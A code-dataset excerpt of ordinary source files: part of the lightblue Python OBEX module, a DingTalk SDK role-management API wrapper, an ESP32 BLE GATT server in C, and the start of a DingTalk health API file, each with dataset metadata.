'DATABASE_FULL', 'DATABASE_LOCKED')
class OBEXError(_lightbluecommon.BluetoothError):
"""
Generic exception raised for OBEX-related errors.
"""
pass
class OBEXResponse:
"""
Contains the OBEX response received from an OBEX server.
When an OBEX client sends a request, the OBEX server sends back a response
code (to indicate whether the request was successful) and a set of response
headers (to provide other useful information).
For example, if a client sends a 'Get' request to retrieve a file, the
client might get a response like this:
>>> import lightblue
>>> client = lightblue.obex.OBEXClient("aa:bb:cc:dd:ee:ff", 10)
>>> response = client.get({"name": "file.txt"}, file("file.txt", "w"))
>>> print response
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={'length': 35288}>
You can get the response code and response headers in different formats:
>>> print response.reason
'OK' # a string description of the response code
>>> print response.code
32 # the response code (e.g. this is 0x20)
>>> print response.headers
{'length': 35288} # the headers, with string keys
>>> print response.rawheaders
{195: 35288} # the headers, with raw header ID keys
>>>
Note how the 'code' attribute does not have the final bit set - e.g. for
OK/Success, the response code is 0x20, not 0xA0.
The lightblue.obex module defines constants for response code values (e.g.
lightblue.obex.OK, lightblue.obex.FORBIDDEN, etc.).
"""
def __init__(self, code, rawheaders):
self.__code = code
self.__reason = _OBEX_RESPONSES.get(code, "Unknown response code")
self.__rawheaders = rawheaders
self.__headers = None
code = property(lambda self: self.__code,
doc='The response code, without the final bit set.')
reason = property(lambda self: self.__reason,
doc='A string description of the response code.')
rawheaders = property(lambda self: self.__rawheaders,
doc='The response headers, as a dictionary with header ID (unsigned byte) keys.')
def getheader(self, header, default=None):
'''
Returns the response header value for the given header, which may
either be a string (not case-sensitive) or the raw byte
value of the header ID.
Returns the specified default value if the header is not present.
'''
if isinstance(header, types.StringTypes):
return self.headers.get(header.lower(), default)
return self.__rawheaders.get(header, default)
def __getheaders(self):
if self.__headers is None:
self.__headers = {}
for headerid, value in self.__rawheaders.items():
if headerid in _HEADER_IDS_TO_STRINGS:
self.__headers[_HEADER_IDS_TO_STRINGS[headerid]] = value
else:
self.__headers["0x%02x" % headerid] = value
return self.__headers
headers = property(__getheaders,
doc='The response headers, as a dictionary with string keys.')
def __repr__(self):
return "<OBEXResponse reason='%s' code=0x%02x (0x%02x) headers=%s>" % \
(self.__reason, self.__code, (self.__code | 0x80), str(self.headers))
try:
import datetime
# as from python docs example
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return datetime.timedelta(0)
except:
pass # no datetime on pys60
_LOCAL_TIME_FORMAT = "%Y%m%dT%H%M%S"
_UTC_TIME_FORMAT = _LOCAL_TIME_FORMAT + "Z"
def _datetimefromstring(s):
import time
if s[-1:] == "Z":
# add UTC() instance as tzinfo
args = (time.strptime(s, _UTC_TIME_FORMAT)[0:6]) + (0, UTC())
return datetime.datetime(*args)
else:
return datetime.datetime(*(time.strptime(s, _LOCAL_TIME_FORMAT)[0:6]))
_HEADER_STRINGS_TO_IDS = {
"count": 0xc0,
"name": 0x01,
"type": 0x42,
"length": 0xc3,
"time": 0x44,
"description": 0x05,
"target": 0x46,
"http": 0x47,
"who": 0x4a,
"connection-id": 0xcb,
"application-parameters": 0x4c,
"authentication-challenge": 0x4d,
"authentication-response": 0x4e,
"creator-id": 0xcf,
"wan-uuid": 0x50,
"object-class": 0x51,
"session-parameters": 0x52,
"session-sequence-number": 0x93
}
_HEADER_IDS_TO_STRINGS = {}
for key, value in _HEADER_STRINGS_TO_IDS.items():
_HEADER_IDS_TO_STRINGS[value] = key
assert len(_HEADER_IDS_TO_STRINGS) == len(_HEADER_STRINGS_TO_IDS)
# These match the associated strings in httplib.responses, since OBEX response
# codes are matched to HTTP status codes (except for 0x60 and 0x61).
# Note these are the responses *without* the final bit set.
_OBEX_RESPONSES = {
0x10: "Continue",
0x20: "OK",
0x21: "Created",
0x22: "Accepted",
0x23: "Non-Authoritative Information",
0x24: "No Content",
0x25: "Reset Content",
0x26: "Partial Content",
0x30: "Multiple Choices",
0x31: "Moved Permanently",
0x32: "Moved Temporarily", # but is 'Found' (302) in httplib.response???
0x33: "See Other",
0x34: "Not Modified",
0x35: "Use Proxy",
0x40: "Bad Request",
0x41: "Unauthorized",
0x42: "Payment Required",
0x43: "Forbidden",
0x44: "Not Found",
0x45: "Method Not Allowed",
0x46: "Not Acceptable",
0x47: "Proxy Authentication Required",
0x48: "Request Timeout",
0x49: "Conflict",
0x4A: "Gone",
0x48: "Length Required",
0x4C: "Precondition Failed",
0x4D: "Request Entity Too Large",
0x4E: "Request-URI Too Long",
0x4F: "Unsupported Media Type",
0x50: "Internal Server Error",
0x51: "Not Implemented",
0x52: "Bad Gateway",
0x53: "Service Unavailable",
0x54: "Gateway Timeout",
0x55: "HTTP Version Not Supported",
0x60: "Database Full",
0x61: "Database Locked"
}
_obexclientclassdoc = \
"""
An OBEX client class. (Note this is not available on Python for Series 60.)
For example, to connect to an OBEX server and send a file:
>>> import lightblue
>>> client = lightblue.obex.OBEXClient("aa:bb:cc:dd:ee:ff", 10)
>>> client.connect()
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>> client.put({"name": "photo.jpg"}, file("photo.jpg", "rb"))
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>> client.disconnect()
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
A client must call connect() to establish a connection before it can send
any other requests.
The connect(), disconnect(), put(), delete(), get() and setpath() methods
all accept the request headers as a dictionary of header-value mappings. The
request headers are used to provide the server with additional information
for the request. For example, this sends a Put request that includes Name,
Type and Length headers in the request headers, to provide details about
the transferred file:
>>> f = file("file.txt")
>>> client.put({"name": "file.txt", "type": "text/plain",
... "length": 5192}, f)
>>>
Here is a list of all the different string header keys that you can use in
the request headers, and the expected type of the value for each header:
- "name" -> a string
- "type" -> a string
- "length" -> an int
- "time" -> a datetime object from the datetime module
- "description" -> a string
- "target" -> a string or buffer
- "http" -> a string or buffer
- "who" -> a string or buffer
- "connection-id" -> an int
- "application-parameters" -> a string or buffer
- "authentication-challenge" -> a string or buffer
- "authentication-response" -> a string or buffer
- "creator-id" -> an int
- "wan-uuid" -> a string or buffer
- "object-class" -> a string or buffer
- "session-parameters" -> a string or buffer
- "session-sequence-number" -> an int less than 256
(The string header keys are not case-sensitive.)
Alternatively, you can use raw header ID values instead of the above
convenience strings. So, the previous example can be rewritten as:
>>> client.put({0x01: "file.txt", 0x42: "text/plain", 0xC3: 5192},
... fileobject)
>>>
This is also useful for inserting custom headers. For example, a PutImage
request for a Basic Imaging client requires the Img-Descriptor (0x71)
header:
>>> client.put({"type": "x-bt/img-img",
... "name": "photo.jpg",
... 0x71: '<image-descriptor version="1.0"><image encoding="JPEG" pixel="160*120" size="37600"/></image-descriptor>'},
... file('photo.jpg', 'rb'))
>>>
Notice that the connection-id header is not sent, because this is
automatically included by OBEXClient in the request headers if a
connection-id was received in a previous Connect response.
See the included src/examples/obex_ftp_client.py for an example of using
OBEXClient to implement a File Transfer client for browsing the files on a
remote device.
"""
_obexclientdocs = {
"__init__":
"""
Creates an OBEX client.
Arguments:
- address: the address of the remote device
- channel: the RFCOMM channel of the remote OBEX service
""",
"connect":
"""
Establishes the Bluetooth connection to the remote OBEX server and sends
a Connect request to open the OBEX session. Returns an OBEXResponse
instance containing the server response.
Raises lightblue.obex.OBEXError if the session is already connected, or if
an error occurs during the request.
If the server refuses the Connect request (i.e. if it sends a response code
other than OK/Success), the Bluetooth connection will be closed.
Arguments:
- headers={}: the headers to send for the Connect request
""",
"disconnect":
"""
Sends a Disconnect request to end the OBEX session and closes the Bluetooth
connection to the remote OBEX server. Returns an OBEXResponse
instance containing the server response.
Raises lightblue.obex.OBEXError if connect() has not been called, or if an
error occurs during the request.
Note that you don't need to send any connection-id headers - this is
automatically included if the client received one in a Connect response.
Arguments:
- headers={}: the headers to send for the request
""",
"put":
"""
Sends a Put request. Returns an OBEXResponse instance containing the
server response.
Raises lightblue.obex.OBEXError if connect() has not been called, or if an
error occurs during the request.
Note that you don't need to send any connection-id headers - this is
automatically included if the client received one in a Connect response.
Arguments:
- headers: the headers to send for the request
- fileobj: a file-like object containing the file data to be sent for
the request
For example, to send a file named 'photo.jpg', using the request headers
to notify the server of the file's name, MIME type and length:
>>> client = lightblue.obex.OBEXClient("aa:bb:cc:dd:ee:ff", 10)
>>> client.connect()
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>> client.put({"name": "photo.jpg", "type": "image/jpeg",
"length": 28566}, file("photo.jpg", "rb"))
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
""",
"delete":
"""
Sends a Put-Delete request in order to delete a file or folder on the remote
server. Returns an OBEXResponse instance containing the server response.
Raises lightblue.obex.OBEXError if connect() has not been called, or if an
error occurs during the request.
Note that you don't need to send any connection-id headers - this is
automatically included if the client received one in a Connect response.
Arguments:
- headers: the headers to send for the request - you should use the
'name' header to specify the file you want to delete
If the file on the server can't be deleted because it's a read-only file,
you might get an 'Unauthorized' response, like this:
>>> client = lightblue.obex.OBEXClient("aa:bb:cc:dd:ee:ff", 10)
>>> client.connect()
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>> client.delete({"name": "random_file.txt"})
<OBEXResponse reason='Unauthorized' code=0x41 (0xc1) headers={}>
>>>
""",
"get":
"""
Sends a Get request. Returns an OBEXResponse instance containing the server
response.
Raises lightblue.obex.OBEXError if connect() has not been called, or if an
error occurs during the request.
Note that you don't need to send any connection-id headers - this is
automatically included if the client received one in a Connect response.
Arguments:
- headers: the headers to send for the request - you should use these
to specify the file you want to retrieve
- fileobj: a file-like object, to which the received data will be
written
An example:
>>> client = lightblue.obex.OBEXClient("aa:bb:cc:dd:ee:ff", 10)
>>> client.connect()
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>> f = file("received_file.txt", "w+")
>>> client.get({"name": "testfile.txt"}, f)
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={'length':9}>
>>> f.seek(0)
>>> f.read()
'test file'
>>>
""",
"setpath":
"""
Sends a SetPath request in order to set the "current path" on the remote
server for file transfers. Returns an OBEXResponse instance containing the
server response.
Raises lightblue.obex.OBEXError if connect() has not been called, or if an
error occurs during the request.
Note that you don't need to send any connection-id headers - this is
automatically included if the client received one in a Connect response.
Arguments:
- headers: the headers to send for the request - you should use the
'name' header to specify the directory you want to change to
- cdtoparent=False: True if the remote server should move up one
directory before applying the specified directory (i.e. 'cd
../dirname')
- createdirs=False: True if the specified directory should be created
if it doesn't exist (if False, the server will return an error
response if the directory doesn't exist)
For example:
# change to the "images" subdirectory
>>> client.setpath({"name": "images"})
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
# change to the parent directory
>>> client.setpath({}, cdtoparent=True)
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
# create a subdirectory "My_Files"
>>> client.setpath({"name": "My_Files"}, createdirs=True)
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
# change to the root directory - you can use an empty "name" header
# to specify this
>>> client.setpath({"name": ""})
<OBEXResponse reason='OK' code=0x20 (0xa0) headers={}>
>>>
"""
}
# response constants
CONTINUE = 0x10
OK = 0x20
CREATED = 0x21
ACCEPTED = 0x22
NON_AUTHORITATIVE_INFORMATION = 0x23
NO_CONTENT = 0x24
RESET_CONTENT = 0x25
PARTIAL_CONTENT = 0x26
MULTIPLE_CHOICES = 0x30
MOVED_PERMANENTLY = 0x31
MOVED_TEMPORARILY = 0x32
SEE_OTHER = 0x33
NOT_MODIFIED = 0x34
USE_PROXY = 0x35
BAD_REQUEST = 0x40
UNAUTHORIZED = 0x41
PAYMENT_REQUIRED = 0x42
FORBIDDEN = 0x43
NOT_FOUND = 0x44
METHOD_NOT_ALLOWED = 0x45
NOT_ACCEPTABLE = 0x46
PROXY_AUTHENTICATION_REQUIRED = 0x47
REQUEST_TIME_OUT = 0x48
CONFLICT = 0x49
GONE = 0x4A
LENGTH_REQUIRED = 0x4B
PRECONDITION_FAILED = 0x4C
REQUESTED_ENTITY_TOO_LARGE = 0x4D
REQUEST_URL_TOO_LARGE = 0x4E
UNSUPPORTED_MEDIA_TYPE = 0x4F
INTERNAL_SERVER_ERROR = 0x50
NOT_IMPLEMENTED = 0x51
BAD_GATEWAY = 0x52
SERVICE_UNAVAILABLE = 0x53
GATEWAY_TIMEOUT = 0x54
HTTP_VERSION_NOT_SUPPORTED = 0x55
DATABASE_FULL = 0x60
DATABASE_LOCKED = 0x61
| 18,261 | _obexcommon | py | en | python | code | {"qsc_code_num_words": 2361, "qsc_code_num_chars": 18261.0, "qsc_code_mean_word_length": 4.96103346, "qsc_code_frac_words_unique": 0.21304532, "qsc_code_frac_chars_top_2grams": 0.01707504, "qsc_code_frac_chars_top_3grams": 0.02219756, "qsc_code_frac_chars_top_4grams": 0.02663707, "qsc_code_frac_chars_dupe_5grams": 0.2870315, "qsc_code_frac_chars_dupe_6grams": 0.26312644, "qsc_code_frac_chars_dupe_7grams": 0.25322291, "qsc_code_frac_chars_dupe_8grams": 0.23734312, "qsc_code_frac_chars_dupe_9grams": 0.20575429, "qsc_code_frac_chars_dupe_10grams": 0.20575429, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03280592, "qsc_code_frac_chars_whitespace": 0.24549587, "qsc_code_size_file_byte": 18261.0, "qsc_code_num_lines": 514.0, "qsc_code_num_chars_line_max": 132.0, "qsc_code_num_chars_line_mean": 35.52723735, "qsc_code_frac_chars_alphabet": 0.81731746, "qsc_code_frac_chars_comments": 0.14287279, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0326087, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.28489645, "qsc_code_frac_chars_long_word_length": 0.04478868, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.06398384, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.00543478, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.04347826, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.01086957, "qsc_codepython_frac_lines_import": 0.01630435, "qsc_codepython_frac_lines_simplefunc": 0.021739130434782608, "qsc_codepython_score_lines_no_logic": 0.14673913, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
007gzs/dingtalk-sdk | dingtalk/client/api/role.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from dingtalk.core.utils import to_text
from dingtalk.client.api.base import DingTalkBaseAPI
class Role(DingTalkBaseAPI):
def simplelist(self, role_id, offset=0, size=20):
"""
获取角色的员工列表
:param role_id: 角色ID
:param offset: 分页大小
:param size: 分页偏移
:return:
"""
return self._top_request(
'dingtalk.corp.role.simplelist',
{'role_id': role_id, 'offset': offset, 'size': size}
)
def list(self, offset=0, size=20):
"""
获取企业角色列表
:param offset: 分页大小
:param size: 分页偏移
:return:
"""
return self._top_request(
'dingtalk.corp.role.list',
{'offset': offset, 'size': size}
)
def addrolesforemps(self, rolelid_list, userid_list):
"""
批量为员工增加角色信息
:param rolelid_list: 角色id list
:param userid_list: 员工id list
:return:
"""
if isinstance(rolelid_list, (list, tuple, set)):
rolelid_list = ','.join(map(to_text, rolelid_list))
if isinstance(userid_list, (list, tuple, set)):
userid_list = ','.join(map(to_text, userid_list))
return self._top_request(
'dingtalk.corp.role.addrolesforemps',
{'rolelid_list': rolelid_list, 'userid_list': userid_list}
)
def removerolesforemps(self, rolelid_list, userid_list):
"""
批量删除员工角的色信息
:param rolelid_list: 角色id list
:param userid_list: 员工id list
:return:
"""
if isinstance(rolelid_list, (list, tuple, set)):
rolelid_list = ','.join(map(to_text, rolelid_list))
if isinstance(userid_list, (list, tuple, set)):
userid_list = ','.join(map(to_text, userid_list))
return self._top_request(
'dingtalk.corp.role.removerolesforemps',
{'rolelid_list': rolelid_list, 'userid_list': userid_list}
)
def deleterole(self, role_id):
"""
删除角色信息
:param role_id: 角色id
:return:
"""
return self._top_request(
'dingtalk.corp.role.deleterole',
{'role_id': role_id}
)
def getrolegroup(self, group_id):
"""
获取角色组信息
:param group_id: 角色组的Id
:return:
"""
return self._top_request(
'dingtalk.corp.role.getrolegroup',
{'group_id': group_id},
result_processor=lambda x: x['role_group']
)
def getrole(self, role_id):
"""
获取角色详情
:param role_id: 角色id
"""
return self._top_request(
"dingtalk.oapi.role.getrole",
{
"roleId": role_id
}
)
def add_role(self, role_name, group_id):
"""
创建角色
:param role_name: 角色名称
:param group_id: 角色组id
"""
return self.post(
"/role/add_role",
{
"roleName": role_name,
"groupId": group_id
}
)
def update_role(self, role_name, group_id):
"""
更新角色
:param role_name: 角色名称
:param group_id: 角色组id
"""
return self.post(
"/role/update_role",
{
"roleName": role_name,
"groupId": group_id
}
)
def add_role_group(self, name):
"""
创建角色组
:param name: 角色组名称
"""
return self.post(
"/role/add_role_group",
{"name": name},
result_processor=lambda x: x['groupId']
)
| 3,746 | role | py | en | python | code | {"qsc_code_num_words": 378, "qsc_code_num_chars": 3746.0, "qsc_code_mean_word_length": 4.8968254, "qsc_code_frac_words_unique": 0.20634921, "qsc_code_frac_chars_top_2grams": 0.08319827, "qsc_code_frac_chars_top_3grams": 0.04916261, "qsc_code_frac_chars_top_4grams": 0.07563479, "qsc_code_frac_chars_dupe_5grams": 0.65802269, "qsc_code_frac_chars_dupe_6grams": 0.54997299, "qsc_code_frac_chars_dupe_7grams": 0.5099946, "qsc_code_frac_chars_dupe_8grams": 0.5099946, "qsc_code_frac_chars_dupe_9grams": 0.42463533, "qsc_code_frac_chars_dupe_10grams": 0.37601297, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00295608, "qsc_code_frac_chars_whitespace": 0.36785905, "qsc_code_size_file_byte": 3746.0, "qsc_code_num_lines": 150.0, "qsc_code_num_chars_line_max": 71.0, "qsc_code_num_chars_line_mean": 24.97333333, "qsc_code_frac_chars_alphabet": 0.77871622, "qsc_code_frac_chars_comments": 0.15029365, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.33333333, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.14776012, "qsc_code_frac_chars_long_word_length": 0.07550578, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.13888889, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.04166667, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.33333333, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0015/Grid_Board | main/gatt_svr.c | #include <assert.h>
#include <stdio.h>
#include <string.h>
#include "host/ble_hs.h"
#include "host/ble_uuid.h"
#include "services/gap/ble_svc_gap.h"
#include "services/gatt/ble_svc_gatt.h"
#include "bleprph.h"
#define MAX_GATT_VAL_SIZE 128
static uint8_t gatt_svr_chr_val[MAX_GATT_VAL_SIZE];
static uint16_t gatt_svr_chr_len = 0;
static uint16_t gatt_svr_chr_val_handle;
/* Custom 16-bit UUIDs */
#define CUSTOM_SERVICE_UUID 0x00FF
#define CUSTOM_CHAR_UUID 0xFF01
static void (*on_write_cb)(const uint8_t *data, uint16_t len) = NULL;
void gatt_svr_set_write_callback(void (*cb)(const uint8_t *data, uint16_t len))
{
on_write_cb = cb;
}
static int
gatt_svc_access(uint16_t conn_handle, uint16_t attr_handle,
struct ble_gatt_access_ctxt *ctxt,
void *arg);
static const struct ble_gatt_svc_def gatt_svr_svcs[] = {
{
.type = BLE_GATT_SVC_TYPE_PRIMARY,
.uuid = BLE_UUID16_DECLARE(CUSTOM_SERVICE_UUID),
.characteristics = (struct ble_gatt_chr_def[]){{
.uuid = BLE_UUID16_DECLARE(CUSTOM_CHAR_UUID),
.access_cb = gatt_svc_access,
.flags = BLE_GATT_CHR_F_READ | BLE_GATT_CHR_F_WRITE | BLE_GATT_CHR_F_NOTIFY,
.val_handle = &gatt_svr_chr_val_handle,
},
{
0,
}},
},
{
0,
},
};
static int
gatt_svr_write(struct os_mbuf *om, uint16_t min_len, uint16_t max_len,
void *dst, uint16_t *len)
{
uint16_t om_len = OS_MBUF_PKTLEN(om);
if (om_len < min_len || om_len > max_len)
{
return BLE_ATT_ERR_INVALID_ATTR_VALUE_LEN;
}
return ble_hs_mbuf_to_flat(om, dst, max_len, len);
}
static int
gatt_svc_access(uint16_t conn_handle, uint16_t attr_handle,
struct ble_gatt_access_ctxt *ctxt, void *arg)
{
switch (ctxt->op)
{
case BLE_GATT_ACCESS_OP_READ_CHR:
if (attr_handle == gatt_svr_chr_val_handle)
{
return os_mbuf_append(ctxt->om, gatt_svr_chr_val, gatt_svr_chr_len) == 0 ? 0 : BLE_ATT_ERR_INSUFFICIENT_RES;
}
break;
case BLE_GATT_ACCESS_OP_WRITE_CHR:
if (attr_handle == gatt_svr_chr_val_handle)
{
int rc = gatt_svr_write(ctxt->om, 1, MAX_GATT_VAL_SIZE, gatt_svr_chr_val, &gatt_svr_chr_len);
ble_gatts_chr_updated(attr_handle);
if (on_write_cb)
{
on_write_cb(gatt_svr_chr_val, gatt_svr_chr_len);
}
return rc;
}
break;
}
assert(0);
return BLE_ATT_ERR_UNLIKELY;
}
void gatt_svr_register_cb(struct ble_gatt_register_ctxt *ctxt, void *arg)
{
char buf[BLE_UUID_STR_LEN];
switch (ctxt->op)
{
case BLE_GATT_REGISTER_OP_SVC:
MODLOG_DFLT(DEBUG, "registered service %s with handle=%d",
ble_uuid_to_str(ctxt->svc.svc_def->uuid, buf),
ctxt->svc.handle);
break;
case BLE_GATT_REGISTER_OP_CHR:
MODLOG_DFLT(DEBUG, "registering characteristic %s with def_handle=%d val_handle=%d",
ble_uuid_to_str(ctxt->chr.chr_def->uuid, buf),
ctxt->chr.def_handle,
ctxt->chr.val_handle);
break;
default:
assert(0);
break;
}
}
int gatt_svr_init(void)
{
int rc;
ble_svc_gap_init();
ble_svc_gatt_init();
rc = ble_gatts_count_cfg(gatt_svr_svcs);
if (rc != 0)
{
return rc;
}
rc = ble_gatts_add_svcs(gatt_svr_svcs);
if (rc != 0)
{
return rc;
}
return 0;
} | 3,948 | gatt_svr | c | en | c | code | {"qsc_code_num_words": 523, "qsc_code_num_chars": 3948.0, "qsc_code_mean_word_length": 3.86998088, "qsc_code_frac_words_unique": 0.20267686, "qsc_code_frac_chars_top_2grams": 0.06916996, "qsc_code_frac_chars_top_3grams": 0.05928854, "qsc_code_frac_chars_top_4grams": 0.0513834, "qsc_code_frac_chars_dupe_5grams": 0.36017787, "qsc_code_frac_chars_dupe_6grams": 0.29199605, "qsc_code_frac_chars_dupe_7grams": 0.23418972, "qsc_code_frac_chars_dupe_8grams": 0.21146245, "qsc_code_frac_chars_dupe_9grams": 0.12252964, "qsc_code_frac_chars_dupe_10grams": 0.08893281, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02036895, "qsc_code_frac_chars_whitespace": 0.34093212, "qsc_code_size_file_byte": 3948.0, "qsc_code_num_lines": 139.0, "qsc_code_num_chars_line_max": 136.0, "qsc_code_num_chars_line_mean": 28.4028777, "qsc_code_frac_chars_alphabet": 0.75749424, "qsc_code_frac_chars_comments": 0.00633232, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.19491525, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.04816514, "qsc_code_frac_chars_long_word_length": 0.01376147, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0030581, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.02542373, "qsc_codec_frac_lines_func_ratio": 0.06779661, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.19491525, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": 0.1440678} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
007gzs/dingtalk-sdk | dingtalk/client/api/health.py | # encoding: utf-8
from __future__ import absolute_import, unicode_literals
import datetime
from dingtalk.client.api.base import DingTalkBaseAPI
from dingtalk.core.utils import to_text
class Health(DingTalkBaseAPI):
def stepinfo_getuserstatus(self, userid):
"""
查询用户是否开启了钉钉运动
:param userid: 用户id
"""
return self._top_request(
"dingtalk.oapi.health.stepinfo.getuserstatus",
